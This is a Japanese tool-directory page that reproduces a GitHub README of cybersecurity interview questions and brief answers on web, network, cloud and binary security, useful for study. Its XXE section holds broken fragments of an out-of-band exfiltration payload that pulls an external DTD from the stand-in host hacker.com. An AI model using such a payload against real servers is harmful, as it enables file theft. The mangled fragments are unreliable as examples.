Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Interview_Tips — これまでに経験したサイバーセキュリティ面接の質問のまとめです。参考になれば幸いです。 | Kitploit
ツール/GitHubGitHub/jigerjain/interview_tips
ウェブセキュリティネットワークセキュリティ暗号化クラウドセキュリティ学習と教育厳選リソース学習パスとコースバイナリエクスプロイト
GitHubjigerjain/interview_tips

Interview_Tips

これまでに経験したサイバーセキュリティ面接の質問のまとめです。参考になれば幸いです。

リポジトリを見る
69176年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

面接のヒント(情報セキュリティ)

このページは私が経験してきた面接のまとめです。かなり幅広い役割をカバーし、何度も不採用になりましたが、それぞれの面接から学び、建設的なフィードバックを集めて前進してきました。 これらの質問/ヒントが皆さんのお役に立てば幸いです。

一般的にカバーする役割は以下の通りです:

  • サイバーセキュリティインターン
  • ペネトレーションテストインターン/レッドチーム
  • Webアプリ/アプリケーションセキュリティインターン
  • プロダクトセキュリティインターン
  • インフラストラクチャセキュリティインターン

クイックヒント:

  • 事前に自分の履歴書を見直し、それに関連する質問を自分自身に投げかけておく
  • 質問や概念について知らなくても、話題をはぐらかさず、仕事に取り組む環境が与えられれば学べると伝える
    すべてを知ることはできません。間違った答えをしたり、説明が必要な場合には、謙虚に受け入れましょう
  • 事前に自己紹介用の短いバイオを用意しておく
  • 最終的な目標と、なぜ情報セキュリティなのかを明確にしておく
  • 最後に、面接の終わりにフィードバックを必ず尋ねること。なぜなら: 情報セキュリティに関する現在の知識のギャップを知り、埋めるのに役立つからです

以下に、私が遭遇したありとあらゆる質問を書き留め、いくつかには回答を記載しました。残りは、特定の回答をググっていただければと思いますし、深く掘り下げたい場合も同様です。その他に、最後に参考文献がいくつかあるので、ぜひご覧ください。それらは本当に役に立ちました。

今後、ノートを見直しながらさらに質問を追加していきたいと思っていますが、[email protected] までご連絡いただき、これについて建設的なフィードバックをいただければ幸いです。ここでカバーされていない何かに出会った場合は、遠慮なく共有してください。

よくある質問

  1. セキュリティの三要素:

CIAとは?

  • 機密性
  • 完全性
  • 可用性

AAAとは?

  • 認証
  • 認可
  • アカウンティング
  1. 脅威、脆弱性、エクスプロイト、リスクの違いと、それらが資産とどのように関連するか
  • 脅威:
    脅威とは、私たちが防御しようとしているものです
  • 脆弱性:
    脆弱性とは、防御努力における弱点または隙間です
  • エクスプロイト:
    脆弱性を利用して資産を攻撃するために開発された能力/プログラム(ソフトウェアまたはソーシャルエンジニアリングのスキルかもしれません)
  • リスク:
    リスクとは、資産、脅威、脆弱性の交差点です
  • 資産:
    資産とは、私たちが守ろうとしているものです
  1. IAMとは何か、なぜ使用されるのか?
    IAMはアイデンティティアクセス管理(Identity Access Management)であり、組織内の役割と責任を分離するために使用されます。セキュリティにおける重要な要素です。アクセスレベルのセキュリティと特権を維持するのに役立ちます。

セキュリティ全般

ネットワーク侵入攻撃のフェーズ:

  • 偵察/情報収集
  • 必要なアクセスの獲得
  • アクセスの維持
  • 痕跡の隠蔽(ログの削除、バックドア、すべての痕跡の隠蔽)

Webアプリケーションセキュリティ

  1. よくある質問:
  • OWASP Top 10

  • XSS(クロスサイトスクリプティング)とは

    • XSSの練習: [https://xss-game.appspot.com/]
    • XSSへの対策: 簡単に言うと、適切な入力検証を使用する
    • CSP(Content-Security-Policy)ヘッダーを確認する
    • XSSのさまざまな種類: 反射型(Reflected)、格納型(Stored)、DOMベース(DOM-based)
    • DOM内でXSSにつながる可能性のあるソースとシンクとは:
      [https://www.netsparker.com/blog/web-security/dom-based-cross-site-scripting-vulnerability/]
  • CSRFとは これは、どの面接官も喜んで聞く一番おいしい質問です
    クイックヒント: 簡潔に。聞かれた場合にのみ、全体のストーリーを説明する

    クロスサイトリクエストフォージェリ(CSRF)は、現在認証されているWebアプリケーション上で、エンドユーザーに意図しないアクションの実行を強制する攻撃です。CSRF攻撃は特に**状態を変更するリクエスト(データの窃取ではない)**を標的とします。攻撃者は偽造されたリクエストへのレスポンスを確認する手段がないためです。ソーシャルエンジニアリング(メールやチャットでリンクを送信するなど)を少し利用することで、攻撃者はWebアプリケーションのユーザーを騙して、攻撃者が選択したアクションを実行させることができます。被害者が一般ユーザーの場合、CSRF攻撃が成功すると、送金やメールアドレスの変更など、状態を変更するリクエストの実行をユーザーに強制することができます。被害者が管理者アカウントの場合、CSRFはWebアプリケーション全体を危険にさらす可能性があります。

  • CSRFへの対策:
    アンチCSRFトークンを使用する
    同一オリジンポリシーを使用する
    Referrerヘッダーの使用

  • HTML/URLエンコーディングとは

  • HTTPプロトコルはステートレスですか?
    HTTPは本質的にステートレスなプロトコルですが、サーバーはCookieを使用してステートフルにしています

  • インジェクションの種類: SQL、コマンド、OS

  • SQLインジェクションへの対策
    パラメータ化クエリとストアドプロシージャを使用する

  1. セキュリティを提供するのに役立つヘッダーを確認する(URLを確認して内容を読み進めてください。基礎を築くのに役立ちます):
  • CSP(Content-Security-Policy) [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy]
    [https://www.html5rocks.com/en/tutorials/security/content-security-policy/]
  • CORS(クロスオリジンリソースシェアリング) [https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS]
  • 同一オリジンポリシー [https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy]
  1. 面接官がこれらを尋ねるのはまれなケースですが、いくつかの面接の後半で以下の質問に出会ったので、記載しておこうと思います:
  • XXE(XML外部エンティティ)とは?
    XML外部エンティティインジェクション(XXEとも呼ばれる)は、攻撃者がアプリケーションのXMLデータ処理に干渉できるようにするWebセキュリティ脆弱性です。多くの場合、攻撃者はアプリケーションサーバーのファイルシステム上のファイルを表示したり、アプリケーション自体がアクセスできるバックエンドや外部システムと対話したりすることができます。
    こちらをチェック [https://portswigger.net/web-security/xxe]
    例:
    root@kitploit:~
]>

&xxe;

root@kitploit:~
状況によっては、攻撃者はXXE脆弱性を悪用してサーバーサイドリクエストフォージェリ(SSRF)攻撃を実行することで、XXE攻撃をエスカレートさせ、基盤となるサーバーやその他のバックエンドインフラストラクチャを危険にさらすことができます。
- 帯域外(Out-Of-Band) - XMLエンティティを使用すると、サーバーからデータを取得してhacker.comに送信できます(サーバーからの出力は不要)

注入対象: document.xml
root@kitploit:~
%remote; %intern; %xxe;

]> &xxe; - you can change xxe entity to general entity

root@kitploit:~
外部ホスト: http://hacker.com/evil.dtd
">
root@kitploit:~
                --- OR ---
"> - consider error-based
root@kitploit:~
参照: [https://phonexicum.github.io/infosec/xxe.html]

- SSRF(サーバーサイドリクエストフォージェリ)攻撃とは
  内部ネットワークへのピボットに使用される可能性があります
- 3層Webアーキテクチャを保護する方法
- Kerberosとは
  https://www.varonis.com/blog/kerberos-authentication-explained/
- シークレット管理とVaultとは
  https://www.hashicorp.com/resources/introduction-vault-whiteboard-armon-dadgar

## ネットワークセキュリティ
- 対称暗号と非対称暗号の違い
- 公開鍵暗号と非対称鍵暗号の違い: 両者は同じ *引っかけ問題*
- 暗号化モード(例: EBC、CBCなど)  
- 完全前方秘匿性(Perfect Forward Secrecy)とは  
  [https://scotthelme.co.uk/perfect-forward-secrecy/]
簡単に言うと、PFSの主な役割は、サーバーの秘密鍵が漏えいした場合でも、攻撃者が過去のTLS通信を復号できないようにすることです。完全前方秘匿性は、エフェメラルDiffie-Hellman鍵交換を使用することで可能になります。これはセッションごとに新しい鍵を提供し、セッションがアクティブな間だけ有効です。  
- 暗号スイートの理解:  
  例: TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256  
  https://scotthelme.co.uk/https-cheat-sheet/  
- データ圧縮と暗号化のどちらが先に行われるか  
  圧縮が先に行われます。データ内のランダム性のエントロピー(散らばり)が低いほど、より高い圧縮が達成できるため、最初に圧縮してから暗号化するのが有利です。
- 暗号化、エンコーディング、ハッシュ化、難読化の違い  
https://danielmiessler.com/study/encoding-encryption-hashing-obfuscation/ 
 - レインボーテーブルとは: *簡単に言うと、事前計算されたハッシュのコレクションです*
 - TLSはどのように機能するのか?  
 *これは私が偶然見つけた素晴らしい画像で、TLSを初心者向けの言葉で理解するのに役立ちました*  
 http://i.imgur.com/5T2fJsG.png
 - 証明書署名とは
 - Tracerouteはどのように機能するか
 - Nmapはどのように機能するか
 - 認証局(CA)とは
 - DMZとは何か、それに含まれるコンポーネントは何か
 - pingはどのポートで動作するのか?  
  *引っかけ問題*であることは間違いありませんが、重要な質問です。   
  ヒント: ICMPはレイヤー3プロトコルです(ポート上では動作しません)。この質問の良いバリエーションとして、pingがTCPとUDPのどちらを使用するかを尋ねるものがあります。どちらかの回答も、それらはレイヤー4プロトコルであるため、不合格です。

## クラウドセキュリティ
一般的にはAWSについて説明しますが、Azure、GCP、Digital Oceanなど他のクラウドプロバイダーもあります。
- AWSの一般的なコンポーネント:  
   S3、EC2、バケット、IAM、Cloud trial、Cloud watch
- IAMとは何か、そのコンポーネント: 簡単に言うと、IAMはアクセス管理に使用され、その機能のためにロール(一時アクセス用)、ポリシー、グループ、ユーザーを使用します
- EC2とは: 仮想マシンを立ち上げるためのElasticインスタンスです
- EC2には暗号化がありますか: はい、あります。Amazon EBS暗号化は、独自のキー管理インフラストラクチャを構築、維持、保護する必要なく、EBSボリュームにシンプルな暗号化ソリューションを提供します。Amazon EBS暗号化は、暗号化されたボリュームとそこから作成されたスナップショットを作成する際に、AWS Key Management Service(AWS KMS)のカスタマーマスターキー(CMK)を使用します。
詳細は以下で確認できます ...
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html

## バイナリエクスプロイト

- バイナリのデバッグに使用できるツール:  
   Linux: gdb、radare、clutter(radareのGUI)  
   Windows: IDA、Binary Ninja
- バッファオーバーフローとは
- フォーマット文字列の脆弱性とは
- スタック領域とヒープ領域の違い(コード、テキスト、BSS領域についても調べてみるとよいでしょう)
- スタッククッキーとは
- ASLRとは何か、なぜ使用されるのか?
- 実行不可メモリとは?

## 参考文献
学習リソース:  
https://regexone.com/ (正規表現は必須です!)   
https://portswigger.net/web-security/  
OWASP Top 10:  
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf  
情報セキュリティ面接の質問:  
https://danielmiessler.com/study/infosec_interview_questions  
トップペンテストの質問:  
https://resources.infosecinstitute.com/top-30-penetration-tester-pentester-interview-questions-and-answers-for-2019/#gref  
Pythonのヒント:  
https://www.codementor.io/sheena/essential-python-interview-questions-du107ozr6  
AWSユーザーガイド:  
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/concepts.html  
SMBとSambaの洞察:
https://fitzcarraldoblog.wordpress.com/2016/10/17/a-correct-method-of-configuring-samba-for-browsing-smb-shares-in-a-home-network/
ツールをダウンロード